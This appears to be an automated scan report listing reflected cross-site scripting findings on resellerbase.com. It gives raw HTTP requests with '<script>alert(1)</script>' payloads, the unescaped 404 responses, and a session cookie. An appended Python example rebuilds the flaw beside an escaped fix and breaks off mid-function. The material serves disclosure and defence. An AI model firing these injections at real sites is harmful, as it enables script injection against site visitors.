Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54a3b<script>alert(1)</script>8d1b654accb/28/ was not found on this server.</p>
...[SNIP]...

2.1961. http://www.resellerbase.com/detail/28/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf44f<script>alert(1)</script>352cda2cde0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28bf44f<script>alert(1)</script>352cda2cde0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28bf44f<script>alert(1)</script>352cda2cde0/ was not found on this server.</p>
...[SNIP]...

2.1962. http://www.resellerbase.com/detail/28/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d597<script>alert(1)</script>8c088807896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/?9d597<script>alert(1)</script>8c088807896=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/?9d597<script>alert(1)</script>8c088807896=1 was not found on this server.</p>
...[SNIP]...

2.1963. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d9a5<script>alert(1)</script>5f0041c7d83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3d9a5<script>alert(1)</script>5f0041c7d83/28/nicline-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3d9a5<script>alert(1)</script>5f0041c7d83/28/nicline-com.html was not found on this server.</p>
...[SNIP]...

2.1964. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b78a<a>4dd4618a620 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/286b78a<a>4dd4618a620/nicline-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/286b78a<a>4dd4618a620/nicline-com.html was not found on this server.</p>
...[SNIP]...

2.1965. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65377<script>alert(1)</script>0cb4fb1db9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/65377<script>alert(1)</script>0cb4fb1db9d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/65377<script>alert(1)</script>0cb4fb1db9d was not found on this server.</p>
...[SNIP]...

2.1966. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8d8d<script>alert(1)</script>014b2c04e2e9b2483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaila8d8d<script>alert(1)</script>014b2c04e2e9b2483/28/rating.php?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8d8d<script>alert(1)</script>014b2c04e2e9b2483/28/rating.php?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1967. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd299<script>alert(1)</script>835f774f4c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcd299<script>alert(1)</script>835f774f4c3/28/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcd299<script>alert(1)</script>835f774f4c3/28/rating.php was not found on this server.</p>
...[SNIP]...

2.1968. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29159<script>alert(1)</script>bcc52dba6b62a2a89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/2829159<script>alert(1)</script>bcc52dba6b62a2a89/rating.php?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2829159<script>alert(1)</script>bcc52dba6b62a2a89/rating.php?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1969. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfb25<script>alert(1)</script>50d05b939c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28dfb25<script>alert(1)</script>50d05b939c4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28dfb25<script>alert(1)</script>50d05b939c4/rating.php was not found on this server.</p>
...[SNIP]...

2.1970. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74014<script>alert(1)</script>1d3c0036461157098 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/28/rating.php74014<script>alert(1)</script>1d3c0036461157098?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php74014<script>alert(1)</script>1d3c0036461157098?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1971. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4d81<script>alert(1)</script>6bcac2db194 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/rating.phpd4d81<script>alert(1)</script>6bcac2db194 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.phpd4d81<script>alert(1)</script>6bcac2db194 was not found on this server.</p>
...[SNIP]...

2.1972. http://www.resellerbase.com/detail/28/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b02a3<script>alert(1)</script>ab4691f89ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/rating.php?b02a3<script>alert(1)</script>ab4691f89ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php?b02a3<script>alert(1)</script>ab4691f89ea=1 was not found on this server.</p>
...[SNIP]...

2.1973. http://www.resellerbase.com/detail/28/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2831e<script>alert(1)</script>597f0290e93a2283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/28/rating.php/2831e<script>alert(1)</script>597f0290e93a2283?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php/2831e<script>alert(1)</script>597f0290e93a2283?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1974. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c81f<script>alert(1)</script>2617603a5d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c81f<script>alert(1)</script>2617603a5d5/28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c81f<script>alert(1)</script>2617603a5d5/28/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1975. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b981f<script>alert(1)</script>01006970906 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28b981f<script>alert(1)</script>01006970906/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28b981f<script>alert(1)</script>01006970906/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1976. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5eb40<script>alert(1)</script>edf7bbccfce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/search.php5eb40<script>alert(1)</script>edf7bbccfce?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php5eb40<script>alert(1)</script>edf7bbccfce?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1977. http://www.resellerbase.com/detail/28/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2be3f<a>a7cd578821 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The "Firm" rating here is conservative. The sink is the same 404 error document that echoes the full requested URL, query string included, and finding 2.1979 shows <script>alert(1)</script> coming back unmodified from that document for this very path. A <script> payload in the Submit3 value is therefore expected to reflect the same way, although this report does not record that test; confirm it manually before treating this as anything less than the Certain findings above. The same reasoning applies to 2.1978 (keyword) and 2.1980 (opt).

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search2be3f<a>a7cd578821&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search2be3f<a>a7cd578821&opt=2 was not found on this server.</p>
...[SNIP]...
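
The injection-and-verification step behind the findings above, as an added example that is not part of the XSS.CX report or of the resellerbase.com code base. It reconstructs the 404 error document as a hypothetical Python function (the real handler is PHP and was not seen; only its output is quoted in the report), puts the raw echo beside the hardened, HTML-encoded version, reproduces the report's three injection styles (append to a REST URL path segment, append to a query value, supply a new parameter name) and classifies how the marker-wrapped tag comes back. Marker strings and tags are taken from findings 2.1965 and 2.1977; all function names are this example's own.

```python
import html
import re
from urllib.parse import urlsplit, urlunsplit

# Template reconstructed from the 404 bodies quoted in this report (hypothetical;
# the site's real error document was not seen).
ERROR_404_TEMPLATE = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n'
    '<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n'
    '<title>Error 404 - Page Not Found</title>\n</head>\n<body>\n'
    '<p>The requested URL {uri} was not found on this server.</p>\n'
    '</body>\n</html>\n'
)

# Markers and tags as used in findings 2.1965 (Certain) and 2.1977 (Firm).
PREFIX, SUFFIX = "65377", "0cb4fb1db9d"
SCRIPT_TAG = "<script>alert(1)</script>"
ANCHOR_TAG = "<a>"


def render_404(request_uri, escape_output):
    """Hypothetical error document. escape_output=False reproduces the raw echo
    seen in the report; True is the fix (HTML-encode before output)."""
    shown = html.escape(request_uri, quote=True) if escape_output else request_uri
    return ERROR_404_TEMPLATE.replace("{uri}", shown)


def inject_rest_parameter(request_uri, index, payload):
    """Append payload to the index-th (1-based) path segment, keeping the query
    string: index=2 on /detail/28/rating.php gives /detail/28<payload>/rating.php
    exactly as in the request line of finding 2.1969."""
    parts = urlsplit(request_uri)
    segments = parts.path.split("/")        # leading '/' makes segments[0] == ''
    if index < 1 or index >= len(segments):
        raise IndexError(f"no REST URL parameter {index} in {parts.path}")
    segments[index] += payload
    return urlunsplit(parts._replace(path="/".join(segments)))


def inject_query_value(request_uri, name, payload):
    """Append payload to the value of query parameter `name` (finding 2.1977)."""
    parts = urlsplit(request_uri)
    pairs = parts.query.split("&")
    for i, pair in enumerate(pairs):
        if pair.split("=", 1)[0] == name:
            pairs[i] = pair + payload
            break
    else:
        raise KeyError(name)
    return urlunsplit(parts._replace(query="&".join(pairs)))


def inject_parameter_name(request_uri, payload):
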